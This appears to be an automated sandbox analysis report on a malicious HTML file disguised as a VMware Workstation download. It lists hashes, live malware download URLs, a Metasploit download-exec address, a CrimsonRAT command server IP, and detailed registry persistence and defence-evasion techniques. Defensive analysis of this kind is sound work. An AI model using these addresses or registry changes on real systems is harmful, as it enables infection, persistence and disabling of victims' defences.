Analysis
-
max time kernel
609s -
max time network
719s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
04/10/2024, 22:54
Static task
static1
Behavioral task
behavioral1
Sample
VMware-Workstation-16-Pro-07-10.html
Resource
win11-20240802-en
General
-
Target
VMware-Workstation-16-Pro-07-10.html
-
Size
8KB
-
MD5
634b27ba5944fa78e8e883c32150c3c4
-
SHA1
c038f37c15d77658362bdcaa7cab9a560fb8d908
-
SHA256
9c90fa883bcb26af0cda67641d4b4aa1138f102552fb1608c41e51c253219ade
-
SHA512
07fc70e3aeefa8455f792cf16bd6d1a920beafb8e260c3e3fd89290d4170d2c6ba084f66fa5c1335b5e3d1815a7224a920ed55766672112ccd4c4494e6619bc2
-
SSDEEP
96:fsuWzPkloqaj5fjmZ/1yyyrh5HPJjeIJumKF95RZjieojwXZkn8oqPTi:mn7m5EtJJjeeu1hkrn88
Malware Config
Extracted
http://blockchainjoblist.com/wp-admin/014080/
https://womenempowermentpakistan.com/wp-admin/paba5q52/
https://atnimanvilla.com/wp-content/073735/
https://yeuquynhnhai.com/upload/41830/
https://deepikarai.com/js/4bzs6/
Extracted
metasploit
windows/download_exec
http://149.129.72.37:23456/SNpK
- headers User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP09; NP09; MAAU)
Extracted
crimsonrat
185.136.161.124
Signatures
-
CrimsonRAT main payload 1 IoCs
resource yara_rule behavioral1/files/0x000300000000069f-1933.dat family_crimsonrat -
CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5124 3084 powershell.exe 136 Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4300 2620 rundll32.exe 180 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" wscript.exe -
Blocklisted process makes network request 8 IoCs
flow pid Process 278 5124 powershell.exe 281 5124 powershell.exe 282 5124 powershell.exe 337 5124 powershell.exe 344 4300 rundll32.exe 363 4536 wscript.exe 365 4536 wscript.exe 381 4536 wscript.exe -
Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2672 powershell.exe 4840 powershell.exe 1320 powershell.exe 2392 powershell.exe -
Disables cmd.exe use via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" wscript.exe -
Downloads MZ/PE file
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mssecse.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procxp.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\control.exe wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\update.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mssecse.exe wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vbsedit.exe wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uTorrent.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit32.exe wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\updater.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\plugin-hang-ui.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\htaedit.exe wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uninstall.exe wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\student.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\attrib.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\plugin-hang-ui.exe wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exe wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner32.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner64.exe wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner64.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adwcleaner_5.005.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\crashreporter.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\installer.exe wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vbsedit.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad++.exe wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit32.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit33.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msert.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VirtualBox.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uTorrent.exe wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad++.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mdsched.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\crashreporter.exe wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\attrib.exe wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\control.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mdsched.exe wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner32.exe wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskhost.exe\Debugger = "wscript.exe C:\\Users\\Public\\ghostroot\\Message.vbs" wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\update.exe wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procxp.exe wscript.exe -
Possible privilege escalation attempt 4 IoCs
pid Process 5868 takeown.exe 1192 icacls.exe 5252 takeown.exe 5328 icacls.exe -
ACProtect 1.3x - 1.4x DLL software 1 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral1/files/0x0003000000025da7-1218.dat acprotect -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 12 IoCs
pid Process 1488 7z2408-x64.exe 4544 7zG.exe 4544 7zG.exe 896 setup.exe 3596 setup.exe 2672 setup.exe 6136 CrimsonRAT.exe 2832 dlrarhsiva.exe 6072 VanToM-Rat.bat 5832 Server.exe 2556 XOYOX.exe 6124 BlueScreen.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 6 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SerCx2.sys reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UserManager reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CBDHSvc reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iai2c.sys reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Power reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ProfSvc reg.exe -
Loads dropped DLL 5 IoCs
pid Process 4544 7zG.exe 4544 7zG.exe 6024 USB_Spreader.exe 6024 USB_Spreader.exe 6136 CrimsonRAT.exe -
Modifies file permissions 1 TTPs 4 IoCs
pid Process 5868 takeown.exe 1192 icacls.exe 5252 takeown.exe 5328 icacls.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\Software\Microsoft\Windows\CurrentVersion\Run\Server = "C:\\Users\\Admin\\Downloads\\VanToM-Rat.bat" VanToM-Rat.bat Set value (str) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\Software\Microsoft\Windows\CurrentVersion\Run\Server = "C:\\Users\\Admin\\AppData\\Roaming\\VanToM Folder\\Server.exe" Server.exe Set value (str) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bolbi = "C:\\Users\\Public\\Ghostroot\\Bolbi.vbs" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bolbi = "C:\\Users\\Public\\Ghostroot\\Bolbi.vbs" wscript.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" wscript.exe -
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\F: explorer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 27 raw.githubusercontent.com 215 raw.githubusercontent.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Public\\ghostroot\\8ydfdsE.jpg" wscript.exe -
resource yara_rule behavioral1/memory/6024-1214-0x0000000000400000-0x0000000000483000-memory.dmp upx behavioral1/memory/6024-1223-0x0000000000400000-0x0000000000483000-memory.dmp upx behavioral1/memory/6024-1233-0x0000000000400000-0x0000000000483000-memory.dmp upx behavioral1/memory/6024-1235-0x0000000000400000-0x0000000000483000-memory.dmp upx behavioral1/memory/6124-2100-0x0000000000400000-0x0000000000409000-memory.dmp upx behavioral1/memory/6124-2103-0x0000000000400000-0x0000000000409000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\7-Zip\7-zip.dll.tmp 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\bg.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ko.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sa.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\7-zip.chm 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\tk.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\7-zip32.dll 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ja.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\mr.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\si.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sl.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ba.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\nb.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\readme.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\bn.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\mng2.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\va.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ca.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\pa-in.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ta.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\License.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\History.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\hu.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ku.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\tr.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\gu.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ne.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sr-spc.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ga.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\tg.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ug.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\7z.sfx 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\vi.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\yo.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\co.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\cy.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\lt.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ps.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\fr.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\mng.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\7z.exe 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\be.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\da.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\kaa.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\7zFM.exe 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\de.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\hr.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\mk.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sk.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\cs.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\kab.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ru.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Uninstall.exe 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ms.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\nl.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\nn.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\uz.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\af.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\es.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ext.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\kk.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\gl.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\lv.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\pt.txt 7z2408-x64.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\System32 wscript.exe -
Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 4 IoCs
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
description ioc Process File opened for modification C:\Users\Admin\Downloads\7z2408-x64.exe:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\Adwind.exe:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\CrimsonRAT.exe:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\BlueScreen.exe:Zone.Identifier chrome.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language USB_Spreader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroRd32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BlueScreen.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7z2408-x64.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Apex.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroRd32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroRd32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe -
Checks SCSI registry key(s) 3 TTPs 58 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened 